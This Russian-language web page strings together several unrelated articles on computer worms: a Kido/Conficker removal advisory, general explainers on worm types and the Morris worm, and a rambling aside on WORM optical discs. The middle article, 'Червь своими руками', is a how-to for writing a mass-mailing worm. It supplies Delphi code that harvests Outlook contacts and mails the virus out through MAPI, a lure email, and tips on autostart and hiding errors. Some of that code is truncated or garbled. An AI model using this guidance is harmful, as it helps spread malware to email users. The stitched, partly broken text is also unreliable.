Progress-servis55.ru

Новости из мира ПК
0 просмотров
Рейтинг статьи
1 звезда2 звезды3 звезды4 звезды5 звезд
Загрузка...

Компьютерный вирус червь

Эпидемия сетевого червя Net-Worm.Win32.Kido & утилита лечения

С начала года наблюдается глобальная эпидемия сетевого червя Net-Worm.Win32.Kido
Данный зверёк распространяется через локальную сеть и при помощи съемных носителей информации.
При заражении компьютера червь запускает HTTP сервер на случайном TCP порту, который затем используется для загрузки исполняемого файла червя на другие компьютеры.
Червь для атаки использует уязвимость операционных систем семейства Windows, обнаруженную в конце октября 2008 года MS08-067 в сервисе «Сервер». Для того, чтобы воспользоваться уязвимостью, червь пытается подключиться к удаленной машине под учетной записью администратора, последовательно перебирая пароли, заложенные создателем в теле вируса.
После запуска, на компьютере-жертве блокируется доступ к сайтам антивирусных компаний. Также блокируется доступ пользователей к доменным именам, содержащим слова «virus, rootkit, spyware» и прочим, с целью не позволить владельцам зараженных компьютеров пройти лечение на сайтах помощи пользователям.
Известны десятки модификаций данного червя.
Рекомендации по удалению выпущены всеми ведущими производителями АВ. ЛК выпустила специальную утилиту — KidoKiller для борьбы с сетевым червем Net-Worm.Win32.Kido, утилита содержит generic-детектирование всех известных модификаций червя.
Алгоритм лечения с помощью данной утилиты описан в данной статье www.kaspersky.ru/support/wks6mp3/error?q >
По материалам virusinfo.info, av-school.ru

Подкатом — алгоритм лечения, скопирован с сайта ЛК, для не имеющих туда доступ в результате действий червя.

Во первых, сайты АВ компаний доступны по IP адресу. Сайт 195.27.181.35
Во вторых, вы можете посетить ресурс Virusinfo.info (216.246.90.119) — наши хелперы помогут Вам справиться с заражением.

Удаление сетевого червя производится с помощью специальной утилиты kidokiller.exe.

Внимание! С целью предохранения от заражения на всех рабочих станциях и серверах сети необходимо провести следующий комплекс мер:

o Установить патч, закрывающий уязвимость MS08-067.

o Удостовериться, что пароль учетной записи локального администратора устойчив ко взлому — пароль должен содержать не менее шести символов, с использованием разных регистров и/или цифр.

o Отключить автозапуск исполняемых файлов со съемных носителей.

Удаление сетевого червя утилитой kidokiller.exe можно производить локально на зараженном компьютере или централизованно, если в сети развернут комплекс Kaspersky Administration Kit.

1. Скачайте архив KidoKiller_v2.zip (другой сайт 1, другой сайт 2) и распакуйте его в отдельную папку на зараженной машине.

2. Запустите файл KidoKiller.exe.

По окончании сканирования на компьютере возможно присутствие активного окна командной строки, ожидающего нажатия любой клавиши для закрытия. Для автоматического закрытия окна рекомендуем запускать утилиту KidoKiller.exe с ключом -y.

3. Дождитесь окончания сканирования.

4. Выполните сканирование всего компьютера с помощью Антивируса Касперского.

Червь своими руками

Сегодня я опишу тебе принцип работы сетевого вируса. Тема, как ты понял, весьма актуальная, поскольку 70% лично моего ящика всегда бывает забита вирусами самого разного пошиба
— от мелких, но злобных VBS-червей до полуторамеговых произведений младших школьников 🙂 Они-то ведь не знают про существование WinAPI 🙂

Для проникновения на компьютер вирусы могут либо использовать баги в ПО юзера (VBS+Outlook= love:)) либо- баги в голове самого юзера. Рассмотрим пример такого вирусного письма:

Subj: Прикол
Привет! Держи крутой прикол, который я тебе (или не тебе, не помню :)) Обещал. Но все равно держи. Не бойся, по-настоящему он ничего не форматирует!
Проверить не забудь, параноик 🙂
Успехов!
Attach: fake_format.exe

Ну так вот: каждый ламероватый интернетчик посылает своим друзьям приколы постоянно, и, соответственно, не очень-то помнит, кому чего обещал; сообщение о «ненастоящем форматировании» переключает мозги жертвы в русло приколов, а слепая вера в антивирусы
— добивает 🙂 Напомню — описанные мной алгоритмы не определяются никакими webами, avp и другими бойцами.

Короче, мне самому уже захотелось запустить этот веселенький прикол. Запускаю 🙂

Error. intel pentium 5 not found!

Ой.. Вроде как не работает? Не, не угадал 🙂 На самом деле вирус тут же перенес свое тело на хард к жертве, записался в автозагрузку, и теперь будет тусоваться в оперативочке (хинт: на медицинском жаргоне «оперативка»- это ОПЕРАТИВНАЯ ХИРУРГИЯ, так что будь осторожен ;)) жертвы по принципу, описанному мной в статье «резидентный вирус своими руками». Только вот проверять он будет не запуск файлов, а подключение к сети интернет 🙂 (в исходнике это будет процедура IsOnline, так, на будущее ;)). Впрочем, одновременно
мониторить запуск файлов тебе никто не мешает
— это все-таки вирус, хоть и сетевик. Поэтому в логику я включу процедуру InfectFile. Таким образом, мы будем использовать следующие функции и процедуры:

ISONLINE — проверка соединения с инетом
SENDVIRUS — догадайся с трех раз
GETMAILS — получаем адреса из AddresBook аутглюка
INFECTFILES —
WORKMEMORY — почти то же, что в прошлой статье, но с модификациями.

До начала собственно кодига на этот раз необходимы будут долгие предварительные ласки Объясняю почему: для чтения адресной книги мы будем обращаться к аутлуку по межпрограммному интерфейсу, а для этого нам нехило поиметь его type library. Вот и делай: projectа import type library, и ищи там…правильно, Outlook express v.9 или какой там у тебя стоит. Девятой считается версия, если не ошибаюсь, из Office2k. Импортировал? Что значит «нет в списке»? Да ладно, бывает. Ищи вручную
— в каталоге с офисом есть файл msoutl.olb. Это она Теперь в раздел uses пиши outlook_tlb и будешь иметь доступ к самым интимным местам адресной книги Ой, какой-то я сегодня озабоченный
В общем, процедура потрошения адресбука должна выглядеть как:

uses
ComObj, outlook_tlb,
Forms;
.
Procedure GETMAILS;
var
MyFolder, MSOutlook, MyNameSpace, MyItem: Variant; s: string;
num, i: Integer;
mails: array of string;

begin
MSOutlook := CreateOleObject(‘Outlook.Application’);
MyNameSpace := MSOutlook.GetNameSpace(‘MAPI’);
MyFolder := MyNamespace.GetDefaultFolder(olFolderContacts);
SetLength (mails,MyFilder.Items.Count);
for i := 1 to MyFolder.Items.Count do
begin
MyItem := MyFolder.Items[i];
mails[i]:= myitem.email1addres;
end;

Читать еще:  Компьютерные вирусы по среде обитания

Ну как, порадовало тебя написанное? Гы, дальше будет только хуже. Потому что отправка вируса будет на чистом API. А это, как говорит Horrific: «то же самое, что ручной секс. Эффект есть в обоих случаях, но его приходится долго добиваться и нет такого кайфа» Ну
так что я тут понаписал? Uses Comobj позволяет нам работать с COM технологией; далее мы только создаем OLE объект аутлука, и циклически выясняем у него список емайлов. Если тебе хочется выяснить еще что-нибудь
— это тоже реально, читай доки — они рулез. Хоть и на английском. Список емайлов пишется в динамический массив из строчек. Его будет юзать функция SendVirus. Вот эта:

function SendVirus(const RecipName, RecipAddress, Subject, Attachment: string): Boolean;
var
MapiMessage: TMapiMessage;
MapiFileDesc: TMapiFileDesc;
MapiRecipDesc: TMapiRecipDesc;
i: integer;
s: string;
begin
with MapiRecipDesc do begin
ulRecerved:= 0;
ulRecip > lpszName:= PChar(RecipName);
lpszAddress:= PChar(RecipAddress);
ulE > lpEntry > end;

with MapiFileDesc do begin
ulReserved:= 0;
flFlags:= 0;
nPosition:= 0;
lpszPathName:= PChar(Attachment);
lpszFileName:= nil;
lpFileType:= nil;
end;

with MapiMessage do begin
ulReserved := 0;
lpszSubject := nil;
lpszNoteText := PChar(Subject);
lpszMessageType := nil;
lpszDateReceived := nil;
lpszConversation > flFlags := 0;
lpOriginator := nil;
nRecipCount := 1;
lpRecips := @MapiRecipDesc;
if length(Attachment) > 0 then begin
nFileCount:= 1;
lpFiles := @MapiFileDesc;
end else begin
nFileCount:= 0;
lpFiles:= nil;
end;
end;

Result:= MapiSendMail(0, 0, MapiMessage, MAPI_DIALOG
or MAPI_LOGON_UI or MAPI_NEW_SESSION, 0) = SUCCESS_SUCCESS;
end;

Ты не опух, пока это читал? Пойди, попей пивка, а то ничего не поймешь.
Выпил? Я тоже Хорошо, продолжаем. Юзать будешь так:

For i:= 1 to length (mails) do
begin
SendVirus (»,mails[i],’pricol’,’..’);
end;

Здесь мы задействуем функции uses MAPI, поэтому не забудь его объявить. Короче, это
— низкоуровневая работа с почтой. А для работы с почтой, как ты знаешь, надо иметь а)
email получателя б) текст письма в) аттач. Вот я и делаю:
MapiRecipDesc — описываю получателя, MapiFileDesc — аттач,
т.е. наш вирус, MapiMessage — это сообщение, потом я его командой MapiSendMail отправлю в большую жизнь Ну, не так это оказалось и сложно. Главное понять, что твой самый большой друг
— это не c:porno, а win32.hlp

Как же теперь все это словоблудие уложить в суровую логику вируса? Сам разберешься, я тебе уже 2 статьи подряд об этом долблю. И вообще, я вчера отмечал день рождения моей девушки, теперь у меня слегка трещит голова Ну ладно, чувство долга сильнее. Just Do It:
первой строчкой проверяешь имя файла, откуда ты стартовал. Если
pricol.exe — значит CopyFile к виндам А если стартанул из виндового каталога
— то циклически проверяй подключение к всемирной сети. Проверяем:

function IsOnline: Boolean;
var
RASConn: TRASConn;
dwSize,dwCount: DWORD;
begin
RASConns.dwSize:= SizeOf(TRASConn);
dwSize:= SizeOf(RASConns);
Res:=RASEnumConnectionsA(@RASConns, @dwSize, @dwCount);
Result:= (Res = 0) and (dwCount > 0);
end;

Так. Если все путем, то вперед — тряси адресную книгу и рассылайся . Тут есть две хитрости. Если твое имя
pricol.exe — незамедлительно проверяй соединение. Возможно, пользователь проверяет почту в онлайне. Так наши шансы на рассылку сильно возрастут. До второй хитрости ты уже допер сам,
а именно, при описанном мной раскладе ты будешь все время отправлять одному и тому же юзеру одинаковые письма, только потому, что его не стерли из адресбука. Следовательно, все отработанные адреса записывай в логфайл и постоянно с ним сверяйся. Вроде бы все. Хотя нет. Не забывай ошибкоопасные фрагменты кода заключать в try..except. И ставить ключ <$D->. Потому что если юзер вдруг поймает ошибку в духе «‘FUCK’ is not valid integer value», он что-то да заподозрит.

ЗАКЛЮЧЕНИЕ

Эта последняя статья про вирусы, отлаженные под windows 9x. Недавно я форматнул винт, и поставил WindowsXP Professional, поэтому следующие примеры будут уже под него. А ты уже можешь потихоньку покупать Delphi 7, поскольку я свои шестые где-то посеял, и сейчас сижу вообще голый Покупать буду, соответственно, седьмые

Следующая статья, наверное будет посвящена стеганографии и ее практической реализации.

Берегитесь — компьютерный вирус червь

Хочу рассказать вам о том, что представляет собой вирус червь. Я называю его вирусом, чтобы всем сразу стало понятно, о чем пойдет речь. Однако между этими понятиями есть разница. Какая? Об этом вы тоже прочтете в моей статье.

Еще коснемся истории возникновения самого паразита и его названия. Вы знали, к примеру, что имя данного паразита берет начало не из животного мира?

Также я поведаю вам, как распространяются сетевые черви, каких видов они бывают и как с ними можно бороться.

Червь: разъяснение и возникновение

В компьютерной области данный термин подразумевает под собой тип вредоносной программы, которая самостоятельно разносится по интернету или локальным сетям. Её отличие от обычного вируса состоит в том, что она не заражает другие файлы, чтобы нанести вред, а лишь копирует саму себя. Но такое поведение тоже может вызвать немало проблем. Далее вы поймете, что я имею в виду.

История появления

Впервые работы по применению червей в распределенных вычислениях провели Йон Хупп и Джон Шоч в 1978 году на базе исследовательской лаборатории Xerox в Пало-Альто.

Свое название паразит получил не от земляных животных, как принято полагать, которые могут пролезть куда угодно и выживают, даже если мы отрубить полтуловища. Источником вдохновения послужили два научно-фантастических романа. В первом — «Когда ХАРЛИ исполнился год» Дэвида Герролда (1972) — говорится о червеподобном софте, а во втором — «На ударной волне» Джона Браннера (1975) — непосредственно применяется само понятие.

Читать еще:  Методы профилактики заражения компьютера вирусами

Первый известный пример

Нельзя не упомянуть «Червя Морриса» — одного из первых и самого известного червяка, названного в честь своего создателя Роберта Морриса-младшего. На момент написания проги (1988 г.) он учился в Корнеллском Университете. Представляете, работа аспиранта проникла приблизительно в 6200 ПК (около 10% от общего числа машин с доступом к Интернету на то время).

Чем опасен был этот червь? Частым созданием своих копий. Дело в том, что Роберт Моррис указал слишком малый промежуток времени между образованием клонов. Вследствие этой, казалось бы, незначительной ошибки, вирус исчерпывал все ресурсы компьютеров, что приводило к их отказу от обслуживания. В итоге он нанес общий ущерб на сумму 96,5 миллионов долларов.

Способы распространения

Чтобы попасть в нашу систему, червь идет на такие уловки:

  1. Обнаружение недочетов в структуре и администрировании имеющегося у нас программного обеспечения. Кстати Червь Морриса воспользовался «пробелами» в почтовой службе Sendmail, сервисе Finger и вычислял пароль при помощи словаря. Примечательно, что распространение таких вредителей даже не нужно контролировать — они работают в автономном режиме.
  2. Слышали про социальную инженерию? Она предполагает управление нашим поведением без помощи технических средств. То есть ее методы основаны на человеческом факторе.
    Так вот, второй способ распространения червей заключается в использовании данной инженерии. Это значит, что мы сами запускаем вредоносную прогу. Конечно, мы об этом не подозреваем, ведь она маскируется под нормальный софт.
    К примеру, VBS.LoveLetter воспользовался тем, что в Outlook Express расширения файлов скрыты, поэтому он ни у кого не вызовет подозрений. Такой механизм популярен в рассылках спама, соц. сетях и пр.

Скорость, с которой распространяются вредители, зависит от разных обстоятельств: топологии сети, способов поиска уязвимостей, насколько быстро они умеют создавать своих клонов и т. д. Стремительнее всего им удается распространяться с одного IP-адреса на другой.

Вообще, они часто пытаются проникнуть в компьютеры случайным образом. Более того, современные антивирусы их быстро обнаруживают, проводят работу над ошибками и делают систему неуязвимой.

Виды компьютерных червей

В зависимости от способа распространения, выделяют такие разновидности червей:

  • Почтовые. Как вы догадались, они попадают к нам по электронке, обычно в качестве прикрепленного файла или ссылки на взломанный или хакерский сайт. После его скачивания он копирует сам себя, находит другие адреса и отправляет по ним своих клонов.
  • Вредители ретранслируемых интернет-чатов — сервисных систем для общения в реальном времени, а также черви файлообменных сетей тоже распространяются в виде ссылок и файлов.
  • Паразиты интернет-пейджеров. Не думайте, что если у вас нет пейджера, они к вам не пролезут. Эти черви переползают по сервисам мгновенных сообщений: ICQ, Yahoo Pager, MSN Messenger, Skype и т. п. Что делают дальше? Как обычно, рассылают свои копии другим контактам.

Все вышеперечисленные виды используют для распространения механизм социальной инженерий. В то время как первый способ присущ сетевым червям. Они выискивают в сети компы, на которых установлено ПО с уязвимостями, при помощи эксплойта — сетевого пакета, содержащего фрагмент червя. Если машина имеет уязвимости, то она принимает этот пакет, паразит полностью пролезает и начинает свои темные делишки.

Другое отличие

Учитывая принцип действия, червей еще можно поделить на такие группы:

  • Резидентные, которые не способны загружаться как простые файлы, поэтому попадают только в оперативную память и инфицируют функционирующее ПО. Таким образом, их можно устранить простой перезагрузкой компа, так как это действие сбрасывает ОЗУ.
  • Вредители, которые загружаются в виде исполняемых файлов, более опасны. После заражения памяти они оставляют код на жестком диске, чтобы суметь активизироваться даже после перезапуска ПК. Они могут осуществлять это при помощи создания специальных ключей в реестре Windows. С таким безобразием можно бороться только антивирусами.

Как видите вирус червь это довольна таки не безобидная штука.

В целом, как и от любого другого вредоносного софта, от этого следует спасаться комплексно: устанавливать брандмауэры и качественное защитное ПО, делать упор на проактивную защиту (методы антивирусов для предотвращения попадания паразитов), остерегаться подозрительных файлов и ссылок.

Компьютерные вирусы, сетевой ЧеРвЬ

Компьютерный вирус – Червь

Червь состоит из двух самых различных определений. Один относится к компьютерным вирусам, а другой к оптической технологии хранения данных.

1). Тип компьютерного вируса.

Также как и живой червь, который проделывает себе проход в грязи и почве, компьютерный червь делает себе проход через память компьютера и жесткого диска.

Компьютерный червь является одним из видов вируса, который воспроизводит сам себя, но не изменяет никаких файлов на вашем компьютере.

Тем не мене, черви могут вызывать хаос, путем умножения и деления себя, столько раз, что они занимают на компьютере, всю доступную память на жестком диске.

Если червь потребляет память, то ваш компьютер будет работать очень медленно. А в зависимости от разновидности червя, это может привести к поломке жесткого диска, и потере всех данных.

Если червь влияет на свободное место жесткого диска, у вашего компьютера будет занимать очень много времени, чтобы открыть доступ к файлам или папкам.

И в конечном итоге, вы не сможете что-либо сохранить или создать новые папки, пока червь не будет ликвидирован.

Червя трудно обнаруживать, потому что как правило, он является не видимым файлом. Эти файлы часто остаются незамеченными, пока Ваш компьютер не начинает замедленно работать, или у него возникают какие-либо другие проблемы.

Читать еще:  Обязательным свойством компьютерного вируса является

Если мы будем ориентироваться на мировую статистику, то примерно от 80% до 90% пользователей персональных домашних компьютеров, даже и не подозревают, что в их системе был червь.

Мы с вами будем винить кого угодно, но только не червя, потому что о нем мы просто забываем.

Почему? Зараженных компьютеров так много, спросите вы.

Все дело в том, что пользователи персональными домашними компьютерами практически не имеют возможности, чтобы защититься от атак извне. Это несмотря на заверения крупных компаний, занимающихся Интернет безопасностью.

Всегда придерживайтесь только одной точки зрения в этом вопросе. «Мой дом, моя крепость»!

И поверьте мне, ни какие заверения «Касперского», (что все под конТРОЛЕМ), меня почему то не радуют. Потому что, каждая компания преследует свои меркантильные цели, и это конечно же – Деньги.

В продолжение темы.

На огромной территории, по всему земному шару, что касаемо домашних компьютеров, то всего небольшая их часть, оснащена антивирусными программами которые были приобретены легально.

Большинство пользователей просто не имеют возможности приобрести себе качественные антивирусные программы.

Вы сами сможете подсчитать, если сами купите все программы которые установлены на вашем компьютере, то их стоимость превысит стоимость самого компьютера.

О какой тут безопасности может идти речь, скажите мне. А злоумышленники и разработчики программного обеспечения зная об этом, просто пользуются ситуацией.

Скажу вам больше по-секрету, зачастую разработчики программного обеспечения и назовем их «доброжелатели» – это одни и те же люди.

Догадайтесь сами почему)).

— Только некому не говорите, это секретный секрет)).

В отличии от различных вирусов и троянских коней, черви могут размножатся и перемещаться между системами, без каких-либо действий со стороны пользователей.

По этим причинам, хорошо если у вас, установленная антивирусная программа в вашей системе, которая может определить и удалить червя, прежде чем у него будет шанс повторить свое распространение на других компьютерах.

Обновления для системы безопасности, такие как Windows Update, закрывает «патч-дыры» в безопасности, которая не позволяет заразить ваш компьютер.

Так что, следите за обновлениями протоколов безопасности антивирусных программ, до новых версий. Но это касается только лицензионных программ. Все остальные будут действовать на свой страх и риск!

2). Оптическая технология хранения.

Червь может означать – «Writ Once, Read Many». Это способ записи данных, на различные носители в компьютере.

Оптические накопители – это технология которая позволяет однократно или многократно делать запись на диск, и потом считывать записанные данные, неограниченное количество раз.

WORM-устройства, были введены в 1970 году и сразу завоевали популярность, как способ архивирования данных.

— Не путать с программами для «Архивации», я описываю способ сохранения ваших данных, а не программы для архивации.

Емкость дисков WORM, начиналась с 140 мб., но постепенно увеличилась до 8 GB. А вот Blu-ray (синий луч), в однослойном формате вмещает в себя 23.3 Гб., а двухслойный 46.6 Гб!

Но кампания «Pioneer» пошла еще дальше, представив свое видение развития лазерных дисков, и выпустила 20-ти слойный диск объемом до 500 Гб!!

Но Японцы небыли бы Японцами, если бы не развивали эту тему дальше, и летом 2012 был представлен диск нового поколения, который создан совершенно по другим технологиям, и у которого объем вмещаемой информации доходит до 1-го Тб! (тера байт), это 1000 гигабайт.

Вам может показаться что речь сейчас идет, о жестком диске. Вовсе нет, это обычный диск, который ничем не отличается от DVD диска, но с не обычными свойствами.

Дело в том, что до этого, что бы записать информацию на диск, нужно было наносить специальный слой на сам диск.

Но новые диски кардинально отличаются от их собратьев, поскольку никаких слоев на этих дисках нет, информацию записывают на всю толщину диска. Отсюда и такой большой объем информации помещающейся на него.

Ох уж эти Японцы (Ханосака Сансеи))).

Тем не менее, старая технология WORM, не имеет стандартного формата. WORM диски, совместимы только с носителями WORM, на которых они и были записаны.

Было очевидно, что у этой технологии нет будущего. Она была дорогой и по этому не получила широкого распространения.

Сегодня, большинство оптических приводов основаны, либо на CD-R или DVD-R технологии.

В отличии от WORM дисков, CD-R или DVD-R проигрыватели, обычно могут прочитать любые компакт диски, не зависимо от производителя.

Из-за улучшения совместимости и снижения затрат, записывать компакт диски и DVD диски, имеют возможность практически все современные компьютеры.

Но пройдет совсем немного времени, и наши дети будут заряжать свои мобильные телефоны, без каких-либо проводов, по без проводной технологии.

Это же будет касаться и передачи всех без исключения данных. Наши квартиры избавятся от сотни метров проводов и кабелей. А системные блоки, даже самых мощных игровых компьютеров, будут встроены в сам дисплей, толщиной не более двух сантиметров.

И уже мы не услышим таких привычных фраз от родителей, «Андрей сынок, ты забыл телефон взять с собой в школу», просто телефон уже будет имплантирован в мочку уха вашего отпрыска, и это не будет значит, что ты мол «голубой или пе…дик», вовсе нет.

Ох уж эти технологии. Джеймс Бонд в действии, за ваши деньги)).

Конечно, это будет доступно если есть деньги, а если их нет, тогда-.

Как сказал один мой хороший знакомый Savat: «Человечество придумало Интернет, для того, чтобы управлять миром не выходя из квартиры».

«Со временем, уже в недалёком будущем, человечество погубят его передовые технологии, потому что, человек погубит саму жизнь!»

Ссылка на основную публикацию
Adblock
detector